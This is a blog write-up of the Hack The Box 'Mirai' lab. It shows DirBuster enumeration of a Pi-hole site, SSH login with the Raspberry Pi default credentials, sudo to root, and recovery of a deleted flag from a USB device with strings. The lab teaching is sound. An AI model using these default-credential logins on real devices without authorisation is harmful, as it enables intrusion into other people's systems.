Hack the box - Mirai

May 25, 2019 07:24 · 722 words · 4 minute read tutorial writeup ctf

If you never heard about Hack the box before, I recommend you to check my first writeup on the Lame box.

Mirai Box

mirai_logo

Mirai was a botnet that used default credentials to exploit and infect a great quantity of IoT devices. This box is inspired by that, we will exploit an insecure device.

Nmap

We start as usual with a port scanning using nmap. mirai_logo

HTTP server

There is an HTTP server that could be interesting.

We use our browser and go to http://10.10.10.48/. There is only a blank page.

DirBuster

We use DirBuster to brute-force the tree of the website.

dirbuster1

Some seconds later, few results appear.

dirbuster_results

We navigate to http://10.10.10.48/admin/ and discover that is the Pi-hole administration page. As the box name Mirai tells us that the solution is probably using default credentials, maybe we can find it for Pi-hole. But after some search, there is no default password for Pi-hole.

Default credentials

However, we have not yet said our last word on this. As the name Pi-hole let us suggest, it’s probably hosted on a Raspberry PI machine, and this has a default password. Let’s try with the credentials username:pi and password:raspberry

~ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $

Bingo we are connected! We can now already grab the user flag located /home/pi/Desktop/user.txt

Root

We can now switch to root user.

sudo su -

Let's now cat the root.txt

dirbuster1

Okay… 🤦

Retrieving the flag in the backup

The content of the root.txt says that there is a backup on his USB drive. So we do a df to see what disks are mounted and trying to locate the device.

root@raspberrypi:~# df -lh
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000
root@raspberrypi:~#

The USB drive should be this /dev/sdb 8.7M 93K 7.9M 2% /media/usbstick/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick

Let’s navigate to the USB stick mounted folder

cd /media/usbstick

dirbuster1

Okay okay… 🤦🤦

Retrieving the removed flag

There is a lost+found in /media/usbstick but nothing there.

So how will we get back the flag? It's probably still there in the memory of the device but has just been marked as removed. Fortunately, in a Unix system, we can access the disk as a file. In our case, it is /dev/sdb. We simply use strings to find all the strings in the disk.

root@raspberrypi:/media/usbstick/lost+found# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
THIS_IS_THE_ROOT_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Bingo! We get the root flag. The box is now done 👏

(In the strings dump, I replaced the root flag by THIS_IS_THE_ROOT_FLAG. It would be too easy if I show it there and let you copy paste it in HTB. If you want to get it, go do it yourself, practice!)

tweet Share